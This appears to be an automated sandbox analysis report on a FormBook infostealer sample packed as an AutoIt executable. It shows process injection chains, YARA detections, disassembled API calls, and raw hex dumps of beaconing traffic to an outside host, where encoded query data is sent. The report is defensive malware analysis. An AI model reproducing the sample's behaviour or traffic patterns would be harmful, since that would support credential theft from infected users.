6a 4b 69 54 41 54 37 53 76 44 41 52 6c 41 5a 6d 4d 30 42 2b 4c 37 35 4d 79 45 6d 58 44 57 6b 52 57 78 47 79 43 6c 45 6c 4d 49 54 4d 65 66 62 43 35 4e 63 6c 55 76 70 48 77 6a 43 66 35 53 4d 39 7a 7a 74 35 74 4a 50 74 4d 30 6f 31 61 67 43 79 6b 6e 6a 70 7a 49 39 78 71 33 48 41 41 41 39 6a 7a 6b 34 46 4b 6a 39 6f 71 68 55 79 34 35 4b 59 39 73 30 56 50 75 31 52 68 78 68 43 71 54 4e 4a 49 2f 64 59 61 67 57 6b 34 46 6f 4b 51 36 42 4d 53 31 4f 66 61 4e 6d 45 50 36 75 56 72 4b 6a 4a 78 69 41 46 77 62 44 4f 78 75 5a 70 44 52 48 45 63 78 6a 34 47 30 53 41 4a 31 75 56 67 41 66 43 4a 76 4a 48 5a 59 4c 74 64 31 77 41 51 46 67 33 38 68 66 32 42 2b 6e 73 46 4c 79 79 79 4f 56 44 47 6e 49 66 56 33 7a 43 32 66 42 65 32 63 69 48 30 49 30 69 75 34 7a 31 4e 35 4c 64 64 6c 58 6c 59 4f 36 6f 70 56 78 70 67 4c 55 6f 6f 70 78 2f 70 63 4c 43 6c 42 30 43 43 48 70 4c 48 6c 75 62 73 37 36 38 52 70 38 73 6b 46 6e 33 2f 48 45 57 4a 57 5a 6f 73 38 6e 6e 4f 50 6b 4a 6e 76 2f 44 49 38 6a 43 65 70 46 4f 70 6c 35 66 35 6a 54 43 54 4d 46 4e 6e 48 51 70 79 5a 53 43 4c 65 78 6f 6e 62 65 35 54 37 32 30 50 52 6b 5a 6f 4c 31 6b 6b 4d 6c 71 4b 39 71 53 6b 6a 33 68 68 4a 6a 38 50 35 49 64 56 6d 6c 64 4f 46 4b 2b 67 6c 4d 44 69 6d 4d 51 5a 4f 55 78 35 56 55 47 42 6a 66 4a 6d 62 50 69 55 49 34 48 58 48 73 46 71 71 36 72 59 4f 69 32 66 6d 4c 41 76 36 55 74 31 42 77 70 63 64 42 6c 59 36 69 59 4c 50 4c 36 72 79 4e 61 4b 32 65 53 45 74 4e 6e 70 52 37 78 30 41 63 48 71 44 47 79 68 30 76 69 47 5a 47 75 56 7a 41 78 63 77 4c 32 59 30 39 4b 70 63 51 72 74 57 70 74 6d 53 6b 6b 6f 65 56 47 34 4d 59 39 4f 44 52 48 30 47 4b 5a 46 6f 6a 31 44 78 66 46 78 58 73 75 35 75 63 42 54 57 4b 36 47 36 71 67 62 72 35 44 6d 65 6e 39 73 4c 52 47 38 55 4f 74 43 35 2b 6a 57 31 45 55 70 64 76 7a 2b 74 47 4a 7a 76 79 75 6d 4c 34 53 43 57 61 4e 4d 38 33 7a 57 52 57 30 43 71 69 66 59 2f 73 4e 70 73 38 30 37 62 70 47 51 57 71 79 6c 2b 32 39 65 68 48 65 47 35 79 69 65 68 79 34 50 56 2f 4b 42 6d 65 55 6b 2b 59 39 47 68 51 4a 78 61 38 33 63 79 79 64 50 67 6a 64 55 32 56 72 55 50 74 59 42 63 41 55 46 42 30 2b 79 41 51 34 50 7a 62 57 42 4e 67 73 4f 33 62 6f 57 4d 70 62 35 71 39 4b 33 6d 4a 62 68 75 31 42 55 30 4e 78 36 34 57 70 43 41 32 67 73 59 32 6a 71 45 3d Data Ascii: bD=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y09KpcQrtWptmSkkoeVG4MY9ODRH0GKZFoj1DxfFxXsu5ucBTWK6G6qgbr5Dmen9sLRG8UOtC5+jW1EUpdvz+tGJzvyumL4SCWaNM83zWRW0CqifY/sNps807bpGQWqyl+29ehHeG5yiehy4PV/KBmeUk+Y9GhQJxa83cyydPgjdU2VrUPtYBcAUFB0+yAQ4PzbWBNgsO3boWMpb5q9K3mJbhu1BU0Nx64WpCA2gsY2jqE=
Apr 19, 2024 03:31:08.558971882 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 19 Apr 2024 01:31:08 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49765	217.196.55.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:31:11.090815067 CEST	517	OUT	GET /fo8o/?bD=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&VVq=lF_H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:31:11.232815027 CEST	1219	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 19 Apr 2024 01:31:11 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?bD=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&VVq=lF_H platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	03:28:00
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"
Imagebase:	0x960000
File size:	1'155'584 bytes
MD5 hash:	CE1F8921D525728D0903CB81E61ADA9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:28:01
Start date:	19/04/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"
Imagebase:	0x130000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:28:08
Start date:	19/04/2024
Path:	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe"
Imagebase:	0xe40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:28:10
Start date:	19/04/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xda0000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:28:24
Start date:	19/04/2024
Path:	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe"
Imagebase:	0xe40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:28:35
Start date:	19/04/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	161

Executed Functions

Function 00963B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00963B7A
IsDebuggerPresent.KERNEL32 ref: 00963B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00A262F8,00A262E0,?,?), ref: 00963BFD

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Part of subcall function 00970A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00963C26,00A262F8,?,?,?), ref: 00970ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00963C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A193F0,00000010), ref: 0099D4BC
SetCurrentDirectoryW.KERNEL32(?,00A262F8,?,?,?), ref: 0099D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A15D40,00A262F8,?,?,?), ref: 0099D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0099D581

Part of subcall function 00963A58: GetSysColorBrush.USER32(0000000F), ref: 00963A62
Part of subcall function 00963A58: LoadCursorW.USER32(00000000,00007F00), ref: 00963A71
Part of subcall function 00963A58: LoadIconW.USER32(00000063), ref: 00963A88
Part of subcall function 00963A58: LoadIconW.USER32(000000A4), ref: 00963A9A
Part of subcall function 00963A58: LoadIconW.USER32(000000A2), ref: 00963AAC
Part of subcall function 00963A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00963AD2
Part of subcall function 00963A58: RegisterClassExW.USER32(?), ref: 00963B28

Part of subcall function 009639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00963A15
Part of subcall function 009639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00963A36
Part of subcall function 009639E7: ShowWindow.USER32(00000000,?,?), ref: 00963A4A
Part of subcall function 009639E7: ShowWindow.USER32(00000000,?,?), ref: 00963A53

Part of subcall function 009643DB: _memset.LIBCMT ref: 00964401
Part of subcall function 009643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009644A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0099D4B4
runas, xrefs: 0099D575

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: b94f50394c043346e8d315c90faac8752472f4cc60853769761cf1c74bbbbdea
Instruction ID: 9dc187c1657663ac806955994017632b0ecb29d5d1e28d079bc6191a59f5f6ee
Opcode Fuzzy Hash: b94f50394c043346e8d315c90faac8752472f4cc60853769761cf1c74bbbbdea
Instruction Fuzzy Hash: 39510731D09288FACF11EBF8EC55FFD7B78AB84344F008175F851A61A2DA745A46DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00964AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00964B2B

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

GetCurrentProcess.KERNEL32(?,009EFAEC,00000000,00000000,?), ref: 00964BF8
IsWow64Process.KERNEL32(00000000), ref: 00964BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00964C45
FreeLibrary.KERNEL32(00000000), ref: 00964C50
GetSystemInfo.KERNEL32(00000000), ref: 00964C81
GetSystemInfo.KERNEL32(00000000), ref: 00964C8D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 64dc7ec61819240571002ca335870943ae7b9e20b67ded26bbdf74d45dcdd1a6
Instruction ID: 2119c6e6a15a7ea0b68cb5e2cfd8510197feb159b20e4a1abbb4860bf686afd7
Opcode Fuzzy Hash: 64dc7ec61819240571002ca335870943ae7b9e20b67ded26bbdf74d45dcdd1a6
Instruction Fuzzy Hash: E891D67194E7C4DECB31CBB885A11AAFFE8AF26300B484D5ED0CB97B41D224E948D759

Uniqueness

Uniqueness Score: -1.00%

Function 00964FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00964EEE,?,?,00000000,00000000), ref: 00964FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00964EEE,?,?,00000000,00000000), ref: 00965010
LoadResource.KERNEL32(?,00000000,?,?,00964EEE,?,?,00000000,00000000,?,?,?,?,?,?,00964F8F), ref: 0099DD60
SizeofResource.KERNEL32(?,00000000,?,?,00964EEE,?,?,00000000,00000000,?,?,?,?,?,?,00964F8F), ref: 0099DD75
LockResource.KERNEL32(00964EEE,?,?,00964EEE,?,?,00000000,00000000,?,?,?,?,?,?,00964F8F,00000000), ref: 0099DD88

Strings

SCRIPT, xrefs: 00965006

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
